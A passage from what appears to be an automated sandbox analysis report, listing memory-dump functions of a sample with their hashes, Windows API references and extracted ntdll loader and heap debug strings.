                                          • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                          • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                          • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: bb5b918038c21a2acbeed7d8393f8fa1918703e5ed683c8da51caa72827645e5
                                          • Instruction ID: 8dc51bd2d5b244068071cd750403b6db99fb2b1bc922d02656a81088d17673e8
                                          • Opcode Fuzzy Hash: bb5b918038c21a2acbeed7d8393f8fa1918703e5ed683c8da51caa72827645e5
                                          • Instruction Fuzzy Hash: 20D022E00062406BC210BAB48C8ECD33628CE4522876888167C8486103E1388A2781E7
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8fccb285d828184e85ebb8b936c51f5cae89542b22bd01a4f05c00b5204b9ebb
                                          • Instruction ID: 68899cc31b5a56ed2593c464ff0ca0a10c685513407a1977f630d45fd903c02d
                                          • Opcode Fuzzy Hash: 8fccb285d828184e85ebb8b936c51f5cae89542b22bd01a4f05c00b5204b9ebb
                                          • Instruction Fuzzy Hash: A0B09B71D419C5D9EB51E760460C71B790067D0751F15C073D2070641F473CC5D1F176
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2160512332
                                          • Opcode ID: 66c4657b1a15a5071a040f18194bd5978123d1df561b080311db96dd01584d3b
                                          • Instruction ID: 67d21cab7f8b529f3106c65bd97b042f415aa3a1eb661f59a9f2489e42e0935f
                                          • Opcode Fuzzy Hash: 66c4657b1a15a5071a040f18194bd5978123d1df561b080311db96dd01584d3b
                                          • Instruction Fuzzy Hash: BF92AEB1A08341AFD760CF28CC81B6BB7E8BB85764F04481DFA94D7291D774E944EB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • Thread identifier, xrefs: 00F9553A
                                          • Invalid debug info address of this critical section, xrefs: 00F954B6
                                          • double initialized or corrupted critical section, xrefs: 00F95508
                                          • corrupted critical section, xrefs: 00F954C2
                                          • 8, xrefs: 00F952E3
                                          • Critical section debug info address, xrefs: 00F9541F, 00F9552E
                                          • Critical section address., xrefs: 00F95502
                                          • Thread is in a state in which it cannot own a critical section, xrefs: 00F95543
                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00F954E2
                                          • undeleted critical section in freed memory, xrefs: 00F9542B
                                          • Critical section address, xrefs: 00F95425, 00F954BC, 00F95534
                                          • Address of the debug info found in the active list., xrefs: 00F954AE, 00F954FA
                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00F954CE
                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00F9540A, 00F95496, 00F95519
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                          • API String ID: 0-2368682639
                                          • Opcode ID: 4e56c9b70262c2d3a3b008b2987fb08973c9b9b1e7a0a90c0ec77281dc9ba3d8
                                          • Instruction ID: 5181d5597e20949db0088fa8c2d0c16a8ad96aec4686ec9090a1dbebe64576a6
                                          • Opcode Fuzzy Hash: 4e56c9b70262c2d3a3b008b2987fb08973c9b9b1e7a0a90c0ec77281dc9ba3d8
                                          • Instruction Fuzzy Hash: 5781ABB1E00758AFEF20CF94C841BAEBBB5BB48B54F244019F944B7281C7B5A946EB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 00F92506
                                          • @, xrefs: 00F9259B
                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 00F92498
                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00F92412
                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 00F92409
                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00F925EB
                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00F922E4
                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 00F924C0
                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 00F9261F
                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00F92624
                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00F92602
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                          • API String ID: 0-4009184096
                                          • Opcode ID: ab0a2d5331799eeddf6942478315d65b7bda4e5c521841ca5e99a5261e767a53
                                          • Instruction ID: 2a6347292aa6a49bbc26d61525f86fccc19520816c2bd9b70f9fb505ea82e536
                                          • Opcode Fuzzy Hash: ab0a2d5331799eeddf6942478315d65b7bda4e5c521841ca5e99a5261e767a53
                                          • Instruction Fuzzy Hash: 000251F2D002289BEB61DB14CC85BDDB7B8AB45314F0441D9AB09A7242D735AE88EF59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                          • API String ID: 0-2515994595
                                          • Opcode ID: 46b5eee8f4152560c1e705b6a461122d2fe174d25abe9d0da2a101ae6ccb0a96
                                          • Instruction ID: 8a6b42acacf5b3d305778ede971d8ebc3c789a383a5bf9b5584b0a5f13f44ca4
                                          • Opcode Fuzzy Hash: 46b5eee8f4152560c1e705b6a461122d2fe174d25abe9d0da2a101ae6ccb0a96
                                          • Instruction Fuzzy Hash: 7D51D2715083569BC325DF188A46FABBBE8BFC43A0F10491DF99583281EB74D905E7A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                          • API String ID: 0-1357697941
                                          • Opcode ID: 0619f20844e46b09b65df367e4a0d492480d8f4b89238219258d9030d41b4b74
                                          • Instruction ID: 7b4bb7b989d82dfac5208f422b3f455dd329ae147a5847397bf035bf49515c35
                                          • Opcode Fuzzy Hash: 0619f20844e46b09b65df367e4a0d492480d8f4b89238219258d9030d41b4b74
                                          • Instruction Fuzzy Hash: 74F1F231A00645EFCB25DF68C441BBABBF6FF09710F18855AE5819B392CB34AD85EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                          • API String ID: 0-1700792311
                                          • Opcode ID: 815f780d0302b1e63a74ec8209f276ab159a72d8924b39d72b295d4af108be9c
                                          • Instruction ID: 4b626ce54d3b828ec90bfcd6522f3de371a2a637171a190a3eb6d02aa50603c5
                                          • Opcode Fuzzy Hash: 815f780d0302b1e63a74ec8209f276ab159a72d8924b39d72b295d4af108be9c
                                          • Instruction Fuzzy Hash: 82D18D35900685DFCB21DF68D841BA9BBF2FF4A720F1C815AE5459B362CB39D981EB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T$`V${
                                          • API String ID: 0-2184846227
                                          • Opcode ID: 77b22a250e0864711442e666997606eb75bf14197c67e24da24c7b6053b3e4f6
                                          • Instruction ID: eaa7852b86e7598a2bd39bde13d5ef1dedcd3a8a8f20590ba72213a10f65c9c8
                                          • Opcode Fuzzy Hash: 77b22a250e0864711442e666997606eb75bf14197c67e24da24c7b6053b3e4f6
                                          • Instruction Fuzzy Hash: EEA25771E0562ACFDB64DF18DC987A9B7B1AF45314F2442E9D80DA7290DB34AE85EF00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 00FA8A3D
                                          • AVRF: -*- final list of providers -*- , xrefs: 00FA8B8F
                                          • VerifierDebug, xrefs: 00FA8CA5
                                          • HandleTraces, xrefs: 00FA8C8F
                                          • VerifierFlags, xrefs: 00FA8C50
                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 00FA8A67
                                          • VerifierDlls, xrefs: 00FA8CBD
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                          • API String ID: 0-3223716464
                                          • Opcode ID: 99989b758f5e73ec8fe9af6d2bb2198736d611eee38f68010bb763db45aca7e9
                                          • Instruction ID: 7aa16bdb0a2d1adf98ed85feb32cf1fe14165f6c6f8e17da8a07d60666b4a1c5
                                          • Opcode Fuzzy Hash: 99989b758f5e73ec8fe9af6d2bb2198736d611eee38f68010bb763db45aca7e9
                                          • Instruction Fuzzy Hash: 12911AF2A45711AFD721DF64CC81B5677A4AB877A0F040458F9816F281CBBDEC06EBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-792281065
                                          • Opcode ID: f188b83bd1547894bca910b639ab3623a0ab715fa4b5bee3a1088e0026b94f6c
                                          • Instruction ID: 4f47c6af3de12723ab24ae27970e5c096c0bc2e65913d3bca9741c489e922043
                                          • Opcode Fuzzy Hash: f188b83bd1547894bca910b639ab3623a0ab715fa4b5bee3a1088e0026b94f6c
                                          • Instruction Fuzzy Hash: DC915371E003159BEF35DF14DC45BAA37A0BB52B24F540128FA50AB2C5DBBDA842F791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 00F9279C
                                          • .Local\, xrefs: 00F52D91
                                          • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 00F92706
                                          • \WinSxS\, xrefs: 00F52E23
                                          • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 00F9276F
                                          • @, xrefs: 00F52E4D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                          • API String ID: 0-3926108909
                                          • Opcode ID: 71c74011323eab14ba9ab32473c06122d7eaf0186dd53174ba2b6292cc80ca47
                                          • Instruction ID: 2b0445a0ea18e334e86003448816ad1c9f3612df9d232f460d776ac27d746b04
                                          • Opcode Fuzzy Hash: 71c74011323eab14ba9ab32473c06122d7eaf0186dd53174ba2b6292cc80ca47
                                          • Instruction Fuzzy Hash: 9D81CD725043419FDB51CF18C890A6BB7F8AF86711F048A5DFD84DB282D774D948EBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 00F799ED
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00F79A11, 00F79A3A
                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 00F79A01
                                          • LdrpInitShimEngine, xrefs: 00F799F4, 00F79A07, 00F79A30
                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 00F79A2A
                                          • apphelp.dll, xrefs: 00F16496
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-204845295
                                          • Opcode ID: 5496b7c600665f67f4fb654d1012c8580d4f6222c563b69a09eef23a9ba9589a
                                          • Instruction ID: a3b48483bbdb824f4545b482698de40a26cb0d9c627008823eb7e8db6c5474db
                                          • Opcode Fuzzy Hash: 5496b7c600665f67f4fb654d1012c8580d4f6222c563b69a09eef23a9ba9589a
                                          • Instruction Fuzzy Hash: 7051EF712083049FE321DF24DC82BAB77E5FB84754F10491AF5899B1A1DB78E944EB93
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00F5C6C3
                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 00F981E5
                                          • Loading import redirection DLL: '%wZ', xrefs: 00F98170
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 00F98181, 00F981F5
                                          • LdrpInitializeProcess, xrefs: 00F5C6C4
                                          • LdrpInitializeImportRedirection, xrefs: 00F98177, 00F981EB
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-475462383
                                          • Opcode ID: 51ae99bc08f035c9435cd65063278f31306c40c1810de9dfd95e510bee6dc6e3
                                          • Instruction ID: 3014c8376e53223da851a518ab16dff56f20168db32aa76ab7eab0d34b76f6df
                                          • Opcode Fuzzy Hash: 51ae99bc08f035c9435cd65063278f31306c40c1810de9dfd95e510bee6dc6e3
                                          • Instruction Fuzzy Hash: F93118717443059FD320EF28DD46E2A7794FF85B20F040528FD85AB2D2DA68ED05E7A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 00F921BF
                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 00F9219F
                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 00F92178
                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 00F92180
                                          • SXS: %s() passed the empty activation context, xrefs: 00F92165
                                          • RtlGetAssemblyStorageRoot, xrefs: 00F92160, 00F9219A, 00F921BA
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                          • API String ID: 0-861424205
                                          • Opcode ID: 50e516ba6ae21d43d1c2dc44d310a0694b626451a809fc6ca24352e3736609ae
                                          • Instruction ID: 54f66781062102f67d4c06c5856a106ffae213a4793c27f2910275f87f784e0a
                                          • Opcode Fuzzy Hash: 50e516ba6ae21d43d1c2dc44d310a0694b626451a809fc6ca24352e3736609ae
                                          • Instruction Fuzzy Hash: 5F313536F00324B7FB21DA949C85F5E76B8DB66B51F1541A9BF04AB281D270EE40F3A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00F62DF0: LdrInitializeThunk.NTDLL ref: 00F62DFA
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F60BA3
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F60BB6
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F60D60
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F60D74
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                          • String ID:
                                          • API String ID: 1404860816-0
                                          • Opcode ID: d69d684f7cccff33307ca993de6f59e9ae6ba3c63b6f64f224c837c3c68ef767
                                          • Instruction ID: 8d463d23a03e77d3574a242bdd78eaf00d23486ce9673d91b5be959cfead21a3
                                          • Opcode Fuzzy Hash: d69d684f7cccff33307ca993de6f59e9ae6ba3c63b6f64f224c837c3c68ef767
                                          • Instruction Fuzzy Hash: CE425A719007159FDB20CF68C881BAAB7F4FF44310F1445AEE999EB241EB75AA84DF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                          • API String ID: 0-379654539
                                          • Opcode ID: 0c170997b41f75e284ecdc0afc1be6f3cfa5051a64771f24fa3048e1e29371f2
                                          • Instruction ID: ec8abebaf14597941fed2d8588042e7701399d6777867ac66222c2de56b1cf2a
                                          • Opcode Fuzzy Hash: 0c170997b41f75e284ecdc0afc1be6f3cfa5051a64771f24fa3048e1e29371f2
                                          • Instruction Fuzzy Hash: 73C1CA71508392CFC711EF18D540BAAB7E4FF84714F04496AF8858B261E778DA49EB53
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00F58421
                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00F5855E
                                          • @, xrefs: 00F58591
                                          • LdrpInitializeProcess, xrefs: 00F58422
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1918872054
                                          • Opcode ID: 9654aee7a81f5154bfe9288fc9da336ca214597365ba41e85b5880927be43b08
                                          • Instruction ID: 51355b808efa3f0feb15476a75733be120edd5467c0c72f85b17308a3c1ef5d8
                                          • Opcode Fuzzy Hash: 9654aee7a81f5154bfe9288fc9da336ca214597365ba41e85b5880927be43b08
                                          • Instruction Fuzzy Hash: 8491AD71508744AFD721DF20CC41F6BB7E8FF847A5F44092EFA84A2151EB38D949AB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • .Local, xrefs: 00F528D8
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 00F922B6
                                          • SXS: %s() passed the empty activation context, xrefs: 00F921DE
                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 00F921D9, 00F922B1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                          • API String ID: 0-1239276146
                                          • Opcode ID: 0e293d820ab486d27f79a52cd98c138fef7cfd42ba1e89c00a32f324d9076e7f
                                          • Instruction ID: 5ae16cffa50e1afe1fb062b4cf0bd64352c2706ac6c84ba1f1c82b94cb6977e5
                                          • Opcode Fuzzy Hash: 0e293d820ab486d27f79a52cd98c138fef7cfd42ba1e89c00a32f324d9076e7f
                                          • Instruction Fuzzy Hash: 1AA1A035D002299BDB64CF54DC84BA9B3B1BF59325F2442EADD08AB351D7349E84EF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 00F93437
                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 00F9342A
                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 00F93456
                                          • RtlDeactivateActivationContext, xrefs: 00F93425, 00F93432, 00F93451
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                          • API String ID: 0-1245972979
